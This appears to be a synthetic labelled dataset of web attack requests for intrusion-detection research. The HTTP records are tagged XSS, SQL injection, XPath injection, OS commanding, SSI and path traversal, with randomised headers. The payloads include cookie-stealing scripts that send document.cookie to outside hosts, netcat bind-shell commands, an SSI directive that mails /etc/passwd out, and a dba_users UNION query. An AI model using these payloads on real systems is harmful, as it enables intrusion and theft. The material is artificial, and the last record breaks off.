TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 0.8; ft-YT; rv:8.2.8) Gecko/55916064
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7707x473
Via: 7.5 240.124.8.2, FTP/9.9 73.20.79.9, 0.9 97.17.163.222
Transfer-Encoding: gzip
Warning: 957 253.110.11.25 "hCgutc3eu9" 
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

.TNJ=eSsgqm&twrsh=792&ts=2&chlfmeiRetiyga=t=&k9s=omepenRsac&hnrlkgo7sti0= https&jnPsmde=1958&tneirirlexf=4907   or    count(path/child::node()[position()=((i+j+k+l+1)]     |    path/child::*()[position()=(k+1)])=1    or  3804=

End - Id: 48522
Start - Id: 46867
class: XSS
POST /0n7/7DczOSz_tQCZP/akGlfxayil/U9IKGc/metaobjectTnetcatcD/bil.asp? HTTP/1.0
Content-Length: 430
Content-Language: daao1i,i1mo,tmc
Content-Encoding: gzip
Content-Location: http://yamhtsk.ch/2byp/BdBn/seeo0o/2tm2ht/euDO.cgi
Content-MD5: ZHJwYW5ldHhudGVhdWVtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Fri, 09 Oct 09 05:53:36 CET
Host: www.xnunoimdcU.de:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Mo-srsimn, g-it2kom, egalN-yra;q=0.4, e0et-FgarsNpe
Cache-Control: rlndl5=ioh
Client-ip: 24.95.5.192
Cookie: nmaiaol1tn=7365;seen=t;kue9i=nSfsCqgjG
Cookie2: $Version="7"
Date: Sun, 06 Sep 09 20:14:39 GMT
ETag: "ynNtDqxUiypefBzDU"
Expect: 100-continue
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 03 Feb 04 16:38:02 CET
If-Unmodified-Since: Fri, 08 Apr 05 02:04:25 UTC
If-Match: *
If-None-Match: "Z_2PyHiv3JhHR73_N"
If-Range: Thu, 10 Jan 08 13:10:37 CET
Max-Forwards: 4
MIME-Version: 8.9
Pragma: ssTeloic='entoXu'
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: leSx ikmsmN=tmSeI0ah
Range: 6262-,10870-70169
Referer: /minire.tar
TE: deflate,gzip;q=0.3
Trailer: Via
User-Agent: ElEioY/8.5.5.6.8
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: HTTP/9.0 www.eamt.htm
Transfer-Encoding: eh1ekT; eniNhsf=nc61l
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

EAlo8gt2rop=Ygweya&1fsonlfefeerhrW=sbMot8y4rdu&hoatt=stoaSaFeoys1&esedgslcTeIdja=7&7M0Vsock_streamf=p'&fieerttt=58&rluAoa8rica9=nn vtolenz&nYrqal1u=drllcwbwi9rtez&Hrl0=j%edne&cegaesjO=3&ou4eu&stNmeyoeeihhel7=ot&7trJwhere3AP_=edsepoaitpw&Sttueimroi=<xml src   =   "javascript:[document.location.replace   ('http://www.es.com/cgi-bin/itma.cgi'+document.cookie);]"    >&4sy4tr=2bREosratos0

End - Id: 46867
Start - Id: 46696
class: XSS
GET /lQ/saGnLisotah/9ihoNnej/tcjGW7XAnA88/tQo.gif?eaaase=26176&Mtigounqua=674144&9qy=3&aoacdanrsdxhms=itdjntAGRw6&uaClity=3&lsrdetbtevrzrif=95102&8hlraitwegBc=9737021&whrfssprFew2i=ssand&nrtibnpteLrjsw1=55&itydncLtre6W=ntwretuhooiE5tae&Z.JGxJzyHDUnode=46085&yt2=hhrarM&ayals3nInydb=t HTTP/1.0
Host: 82.103.163.242:80
Connection: lttgRoV
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.5, euc-tw;q=0.8, gb2312, utf-7;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=11
Client-ip: 161.213.71.224
Cookie: rNbbgsoundZ53mDE7=248321;Iet8Doizwsaas=<iframe     src=   "  vbscript:[document.location.replace    ('http://www.li.com/cgi-bin/elniortesi.cgi'+document.cookie);]     " >
Cookie2: $Version="868"
Date: Fri, 13 Jan 06 15:49:13 CET
ETag: "FM05EHpftuteCC8H"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Thu, 29 Dec 05 09:19:51 CET
If-Unmodified-Since: Tue, 27 Mar 07 23:42:41 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jun 07 08:12:27 GMT
Max-Forwards: 41
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 6eo7l rrpb=5fahe
Authorization: 5Uyluh eredN=Eeoxya
Range: -3,19888-
Referer: /l9anb/Lgypost/f4muper.html
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/5.4 (Windows; U; Win98 2.2; 0a-gf; rv:4.5.1) Gecko/89655942
UA-Disp: 232,926,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 007x164
Via: 1.7 186.34.117.79, HTTP/0.1 37.171.214.242
Transfer-Encoding: compress
Warning: 551 www.rrtles.tiff "mtemnedikCwpaoSe" 
X-Forwarded-For: 246.25.36.156
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46696
Start - Id: 49249
class: XPathInjection
GET /oC-4pQsflJ_OI83wuZ3/rnhaon.php4?e0lmuc=3+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++01268%3D&rmXQZlfB_X=oqps&zraepetoco0xeot=yeeaho%24gN&toWb=3nebi2gn3ae4nhclc&iZsock_streammQAiFj2.=%3Bm1gir2fctst&aws=045 HTTP/1.1
Host: www.yedneork.fr:21471
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: rttee-oet, l5ArRmfo-S0fiee, esu-elb4pEe;q=0.6
Cache-Control: max-stale=05
Client-ip: 247.83.20.197
Cookie: ialhhecnt=Enietcm|erp~positionzz;ic=24;pouydioiZr=12214
Cookie2: $Version="1"
Date: Sat, 15 May 04 21:57:06 UTC
ETag: "H1R.iGgL4UA_bh.Cb"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Wed, 26 Aug 09 18:04:51 GMT
If-Unmodified-Since: Sat, 02 Jan 10 18:44:13 CET
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Tue, 04 Mar 08 12:27:06 UTC
Max-Forwards: 5675
MIME-Version: 6.6
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: aglk hodc6t=qgoaeH
Range: 673-,-741678,577-
Referer: /s8cids/tprx.cgi
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: ntaleh (eWT_Lxtfn; a3gFRhjW; nJia@bQ)
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49249
Start - Id: 42088
class: SqlInjection
GET /k2.css?mipylree=bd%27%2F**%2FUNION%2F**%2FSELECT%2F**%2Fee2Ltta7it%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fa5%2F**%2Flike%2F**%2F%27%2525&n1aea=eso&@LWrNXstylezT=zr9iitywaaodo&nti=whei1aweir&paCeibdhe=689537995&twhesiadik=es6H6lgaF2&lubgsoundElink=%40&PZM1eV=%3Dprocessing-instructioneval+aiji%5Dp HTTP/1.1
Host: www.rn8t.st
Connection: ikn4
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, compress;q=0.1, identity;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 44.233.251.244
Cookie: teetzaiE=enrtT;icbwsdmhili=h6;eO=tK2JTw;eahird=233438;shrnhameronn8=eiatliker8ctEf9diK
Cookie2: $Version="940"
Date: Sun, 10 Feb 08 21:49:22 CET
ETag: W/"phC4cGvpGhlmbE.qux"
Expect: bu7dtjr
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 13 May 05 05:31:51 CET
If-Unmodified-Since: Sat, 08 Mar 08 03:08:32 CET
If-Match: "gQW96dIn6-vQPmsomA"
If-None-Match: "CBdoAIx1Iol5FHJG"
If-Range: "RwDNWimwizwzv2YAtk"
Max-Forwards: 4932
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: -951
Referer: /xmraen/hawnn.nsf
TE: deflate;q=0.1
Trailer: If-Match
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 2.3; au-lc; rv:1.1.3) Gecko/22225743
UA-CPU: x86
UA-Disp: 7402,9004,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: auhi; indgdeow=tRtudi
Upgrade: z6NS/9.8, Brl/1.0, ets/2.0
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42088
Start - Id: 43917
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.nirrhetN.gov:80
Connection: close
Accept: audio/basic, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eo2q-oiyn
Cache-Control: no-store
Client-ip: 134.255.20.254
Cookie: C4id5ehttps=[? p;Wseu=logatzloghttpsrs rrahoilm s;issm1h5g=hze?s;ymseepai6efrmae=seo;pntspre2cRkggen=0539052709
Cookie2: $Version="44"
Date: Thu, 10 Aug 06 05:29:23 CET
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: iahe=MeGsltt;ntEYm3e
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Thu, 27 Jan 05 17:52:30 GMT
If-Unmodified-Since: Thu, 04 Feb 10 23:44:25 UTC
If-Match: "wUYpfCXl6otd5uZX"
If-None-Match: *
If-Range: Sun, 17 Dec 06 16:19:22 CET
Max-Forwards: 25
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic ZXNjUkM3bTplUHNsalE=
Range: 6652-,-36477,66590-93
Referer: http://www.bari2e.org/iursgajt/5z9h/toc3ne8e/lotTte.php3
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/8.0 (compatible; t3et; Open BSD i586; gsoEDe; aldn3adtLh)
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/6.4 30.69.208.49:1143, HTTP/8.0 142.51.63.146
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43917
Start - Id: 40935
class: SSI
GET /uO6Oyoeefit8x/chqhfgs/imfn6cmlajohneircn/mivilrhl/i0GOfO.nsf?3nijc3hlheIcMbF=eqfs9-DNLS&qviframe0UBNTVftpa=tese&iisfaeih=%3C%21--++++%23odbc+statement%3D+++%22select+++++5rEtnse%2C+++++tbaEdneo%2C++++raIpont+from++++6gli9dcft++++order+++++by+++++9%2C+++++27%2C+++++5%22+++++--%3E&hHveSyfchhixeiV=eermaRianDhJsno&IAAa_P_M=B1t&ibncvtaor=h%28et&xvDzhboot.inifqTI=fEuedu5%40nog HTTP/1.1
Host: www.reom.uk
Connection: ng6EEdO
Accept: application/*;q=0.9, video/quicktime;q=0.2, application/*
Accept-Charset: cp-950;q=0.4, windows-1257;q=0.7, iso-8859-5;q=0.0, iso-8859-7;q=0.2
Accept-Encoding: 
Accept-Language: cse5Ed-np
Cache-Control: no-transform
Client-ip: 214.42.169.226
Cookie: kl@R@eMH=elog(dhe]ejnph-o:rhome/%rn?;etiksBaltcmneaw=sqN;mt=iZB;SdarbtswhOeioo3=rdivriab;ehys9a=6339;tmWaolmtlr0oski=3sq6mitro'iday
Cookie2: $Version="9"
Date: Thu, 19 Nov 09 13:24:25 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: 100-continue
From: jzt9n3q@3ah1fe6g.be
If-Modified-Since: Thu, 11 Sep 08 02:03:07 UTC
If-Unmodified-Since: Fri, 11 Dec 09 06:25:19 GMT
If-Match: *
If-None-Match: *
If-Range: "MLtqx@CHsQXo_qSlWy"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: pjwMe=he50
Proxy-Authorization: Basic b3NUbmNmOmFlZXdocg==
Authorization: NTLM c21lcm51ZTJ0MmV1aU5kc3N0eWtUa2NvbjdzZHNkc29rZWxFdHJk
Range: -25
Referer: /sevjbex/ETca/qhlaeies/cmte/otus.exe
TE: trailers,deflate;q=0.3,gzip
Trailer: Upgrade
User-Agent: ttsag5t6ik (tQXeX1Uqw@; 90jlsUWS; sCaoWAf7Zi; aWsysYQE; aSeqSg)
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4871x5124
Via: eLn/7.8 146.122.153.248
Transfer-Encoding: identity
Upgrade: 7hos/6.7, so3/0.2
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40935
Start - Id: 42878
class: OsCommanding
GET /dtsicfeiEnzt/bZiylOsPJ-/K8flMLqo/uI0@KzoaThttps/bmeuccqooYooWH4/eBc4m5jlBW@/yynrwpeaoe9aoaN7n6g/nuoh3a/aUddonttnoE6sElge/f_N7rMH0STtxmqxz3.jpg?isswheons=%7C++++shell%28+++++%22cmd+++%2Fc++++c%3AInetpubwwwrootMSISSnc.exe+++-l+++++-p++5514+++-t+-e++++cmd.exe%22+%29%7C++%27&lsaEqreto8tlt=a5g6 HTTP/1.0
Host: www.tRnfd.fr:909
Connection: keep-alive
Accept: audio/*, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: cYei9t3j='lMi'
Cookie: se=ngst;xeh=rmlet;rqEewwsTxtcid=EpohPieqsjnbeFa6
Cookie2: $Version="443"
Date: Sun, 02 Nov 08 18:14:45 CET
ETag: W/"nErZ9x7YrYRGoxmbEQjD"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Tue, 15 May 07 04:26:46 CET
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "AetJ3vyGNa.Y_EyF7"
If-None-Match: *
If-Range: *
Max-Forwards: 33
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM cG8wZVJ4ZmZ1bjc2c1RsYU5kblRzT2R0aW5Ib290b3A1
Authorization: Basic bGVhZTpzc0hTc3Vv
Referer: http://utwoiAs.it/s3cx/oo5lm2/leywET/eqsuNyh.js
TE: trailers,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (X11; U; Solaris 8.7; ae-tH; rv:7.5.9) Gecko/22572109
Via: HTTP/2.9 www.nadel.tiff, 6.9 155.196.119.58:4, 6.0 48.133.224.102
Transfer-Encoding: tokeq6
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: ------------------------------------------------

null

End - Id: 42878
Start - Id: 43387
class: OsCommanding
GET /rph-euQ8P/deleteg/snPKfSMGtHPhaxRmR4FG/dKhd/wdtiy/iuEgnAutksSen4n/duiesdgemmti/cRJ_DEidNHm/6MautoexecApasswd0rQ1/erjhtmaNXintwop22rn.msf?EieJwwneewsrhat=e8n4&oTxAifySrE1a=0&ltrsXessBn6u=ifY&Mye=anmI&oxiiahtnoihj=0estu&u57tei=hca&Z-Gy_rxBH=2017136&allZtG22x-Ov=%250a++nc+++++www.naesitteerne.com++80%3B&msgHEbis4tqi=9361429&Alrs41=nmetatmpdiv&kuRopteEcopy_=samtquNadgasmpd&aaadaeh=066&i1whLnod9skToi=xp_LTfmn4pteQ HTTP/1.0
Host: 212.212.162.65
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Fri, 23 Sep 05 12:13:40 UTC
ETag: "IO-Ofwsum0Av3WPT"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Thu, 18 Dec 08 11:50:24 UTC
If-Unmodified-Since: Tue, 16 Mar 10 03:51:34 GMT
If-Match: "pPp3B_451yr-xkCP3NZ"
If-None-Match: *
If-Range: *
Max-Forwards: 558
MIME-Version: 1.8
Pragma: lv0e='6dil'
Proxy-Authorization: Basic OGlldnM6aW5vdA==
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 6605-,-56,5118-
Referer: http://nrus.gov/oheoz7e/hrgr/enLpen.sh
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 3.5; ji-yt; rv:7.7.7) Gecko/05349956
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9788x122
Via: HTTP/7.1 159.253.182.165:7
Transfer-Encoding: identity
Upgrade: asl/7.8, ni0se/0.8, eramny/7.3, oiHet/2.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43387
Start - Id: 44886
class: PathTransversal
GET /etm.j/uQE2@/w2onb5Weoaintg/b@EvX/mb.htm?aswumtigjoei=iev&lj=4sc%40hsmceji&yagreseA1d=747733&nd7lEsoeinM3=.%2F..%2F.%2F..%2F&GQ3NzSdelete.7=oU_YJFRvdj&x_@R=o+log%3Aai+d%25TeU+yR&OaNe=ei+eu&ecad0t=+&asyluc9jdaeifes=eotRa&cpboree=%40his&sbhbnotjs=oselecta&rdPhoo3EhNro8=ao+t%7E HTTP/1.0
Host: 60.54.251.172
Connection: close
Accept: application/zip;q=0.2, text/html
Accept-Charset: cp-936, cp-936;q=0.7, iso-8859-7, iso-2022-jp
Accept-Encoding: 
Accept-Language: r5arj-Xpn;q=0.4, lnreb-Nstits;q=0.6, 8e-se;q=0.8, httnees-a
Cache-Control: max-stale=89146
Client-ip: 28.173.55.36
Cookie: b5nss=CAqa;Fntat5wnTb=102;ehhWsaEsdpzhSn=83;sicclqtnt5dct=Ex;2dedetVeL0htHo=caU6tesgytea
Cookie2: $Version="47"
Date: Thu, 03 Jan 08 10:50:19 GMT
ETag: "Fg6uxv@CUmKOi65"
Expect: 100-continue
From: lalrk0d@mOge.gov
If-Modified-Since: Wed, 14 Feb 07 07:17:28 UTC
If-Unmodified-Since: Fri, 18 Jun 04 15:55:03 GMT
If-Match: "WBL@5hL_Hit7g2QoC.p"
If-None-Match: "PIjATg6JrPo0nvnZ"
If-Range: "dqm2ilIOg7eS4FBj"
Max-Forwards: 929
MIME-Version: 2.7
Pragma: nE=R3r
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest cnonce="1Emt"
Range: -41,56231-,-8575
Referer: /rhad/o8atgi/ebeer.pl
TE: trailers,chunked,gzip
Trailer: Expect
User-Agent: sUfCaVq http://www.tdRliTrt.cz
UA-CPU: StrongARM
UA-Disp: 4734,136,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 134x0521
Via: lZ2b/2.7 www.nWlgw.css, 3.0 www.en1t.jpeg, HTTP/2.0 www.TgtoeoUT.css:0
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44886
Start - Id: 40142
class: SSI
GET /lyejGiW6/tva/hgDDKfogDZt/iiriimtstamirt/nhntnda6hgat/sajd1ohihroryiext0d/aOnzP@_KIb2bjoe/yrIoh0dnecwfcp6E/earidsaolt/uPQh/6hiah4h3eer/htaeceDSOtbh.mdb?naotticutnIeo5o=%3C%21--%23exec++cmd%3D%22%2Fbin%2Fmail+nn9Jh.com+++%3C+%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.nkoeyws.it:54534
Connection: close
Accept: text/plain;q=0.5, application/x-tar
Accept-Charset: iso-8859-3, euc-kr;q=0.2, ks_c_5601-1987;q=0.7, cp-936, iso-2022-kr
Accept-Encoding: compress;q=0.3, identity;q=0.7, deflate;q=0.5, deflate, compress
Accept-Language: *
Cache-Control: min-fresh=87
Client-ip: 241.243.180.77
Cookie: omsnyghontwlD4o=f(Re;dOaltmteeiab=ne;i7ceontoqi= iSyeoss2ddowe(
Cookie2: $Version="982"
Date: Sun, 23 Sep 07 13:21:54 GMT
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Thu, 07 Jan 10 21:29:37 GMT
If-Unmodified-Since: Sun, 03 Jul 05 08:57:10 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Jul 04 12:35:15 GMT
Max-Forwards: 5
MIME-Version: 3.7
Pragma: sxyoca='5ovngo'
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: Digest realm
Range: 01-76865,-324119,86535-
Referer: /e9cRs/ehhwrpy/Winticd3/togroroe/easg.tar.gz
TE: trailers
Trailer: From
User-Agent: 9.PE7LWdL http://www.ihsa.net
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x553
Via: 1.1 www.etiEimr.png
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40142
Start - Id: 42523
class: SqlInjection
GET /oHU7Ma1og7WLNT3N-8V/n.ZBjmUP9pH5v5KuZ7.mdb?msibeS8plf2og=4&WCcagN=e1okhda2T&Naihrarns=urcrobzelr7noit8&Faatmntit=53103&syHrt8=8032208&leeasetydtA6=5572490&oa=%27++++%2F**%2F++OR+%2F**%2F+%27hrs%27+++++%3E++%27S&ht=eoOaaortlvu2etr HTTP/1.0
Host: www.dyy3.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, x-mac-chinesesimp;q=0.2, iso-8859-8-i, iso-8859-1
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 126.1.229.33
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="1"
Date: Mon, 31 Mar 08 04:25:00 UTC
ETag: W/"bdccCy6uK1YsnZ3Ajlk0"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Sat, 06 Sep 08 17:16:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jul 09 11:50:46 GMT
Max-Forwards: 9
MIME-Version: 6.0
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: Basic Y1h3aDppZHBiemhSOQ==
Range: 430-,2-8084
Referer: http://www.D7sthn.st/gedoe1t1/opemdu/semi/nei3m.asmx
TE: deflate,trailers,deflate;q=0.5
Trailer: Via
User-Agent: Mozilla/0.4 (compatible; MSIE 1.8; Windows NT; olenoM5ess; utm440aryE)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 7.6 250.255.87.61
Transfer-Encoding: deflate
Upgrade: est/3.4, YhOty/4.0, cy16/8.0, cdtno/6.6
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42523
Start - Id: 42820
class: OsCommanding
PUT /nXSt6xzCpRTl/icijaa6igeteo/nRO9VTy.jsp? HTTP/1.1
Content-Length: 261
Content-Language: pih1
Content-Encoding: gzip
Content-Location: http://idizttp.org/oisfoa/tietceod/tc6o/edwvoe/g98La.js
Content-MD5: b2FoZVJhOG9rb3V0eXNpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jun 09 14:16:13 UTC
Last-Modified: Wed, 23 May 07 02:23:16 GMT
Host: 132.26.96.248:80
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.6, cp-936;q=0.0, iso-8859-2;q=0.2, macintosh, windows-1253;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=829
Client-ip: 114.218.58.189
Cookie: ty=include;6ckolKxdmsYicdx=42413942;ar2irh=5335;ueqz=155419
Cookie2: $Version="5"
Date: Sat, 13 Oct 07 02:20:41 CET
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Fri, 18 Mar 05 05:04:36 UTC
If-Unmodified-Since: Fri, 14 Mar 08 11:57:36 CET
If-Match: "itmYRfSEF_OuuO0xH"
If-None-Match: "DCbs8O6ffKpmP88g"
If-Range: *
Max-Forwards: 8
Pragma: N='uxx'
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.mandee.de/tnwt.php
Referer: /AavwfiE/rsegsoE/gsdn/e6ilt8/57uhrtet.bin
TE: deflate,chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: cYResd1Ljog3dneac7
UA-Pixels: 0367x479
Via: m2ht/6.2 166.13.184.56:2, HTTP/8.9 170.6.70.105
Transfer-Encoding: deflate
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

wfs=wimY0eufgasasen&hTsock_streamVueR8bI0o=qoM%dAa%tom8ecopyp&thtNi5=7hrpositionOhtpassd|airQxterm6&9siepioftrxja5o=|dir  ..\\..\\..\\..\\..\\..\\..\\   ,&fcqeostiYnTA=1898236&sm1nq=)Irdimte&eoarubENh5=sN18\thd;de ehr

End - Id: 42820
Start - Id: 49384
class: XPathInjection
GET /9rwestaperEu/nBJB7UE@xowK6pv/tAtswczer0iHEih0eL/ahcdIe5ie/neitlunfhZIechxrft/psoaiacautca/3wo/e0uzln6Ua8xD/s.CfC4-BeaLbEsV.jsp?e9i8ljkg=es%27+++++or++6++++%3C++count%28path%2Fchild%3A%3A*%29++or++++%27hkeonrs%27+%3D%27&orIds=53749401&aqxyOBpasswd=e1V6ZW&Pphph5=nF34.eGRff&jEfSpTvhee=924&fndmounme=onllsdunion&yVzH7G@Tl.T=9 HTTP/1.0
Host: 90.144.116.31
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.4
Accept-Encoding: *
Accept-Language: p-uKeoTsfM, Vyaeln-9, emlta-a, d-noEa
Cache-Control: only-if-cached
Client-ip: 227.191.80.33
Cookie: hcPbqlYzntmp2a=altwal;indsxs=alsc
Cookie2: $Version="66"
Date: Mon, 16 Aug 04 15:35:30 GMT
ETag: W/"BQ8qcs5LUF@poCI-A3p"
Expect: e9are=3ga6;rreedh=exVa6
From: pail@dkPluia.de
If-Modified-Since: Sun, 20 Jan 08 19:44:22 GMT
If-Unmodified-Since: Tue, 14 Mar 06 14:43:31 GMT
If-Match: *
If-None-Match: "aXnNKM7jKlphr15xo"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: tTnooI of7n=unaoo16
Range: 6-,-18019
Referer: /drCfmdK2/bube/roela/enec36O.php
TE: trailers
Trailer: Range
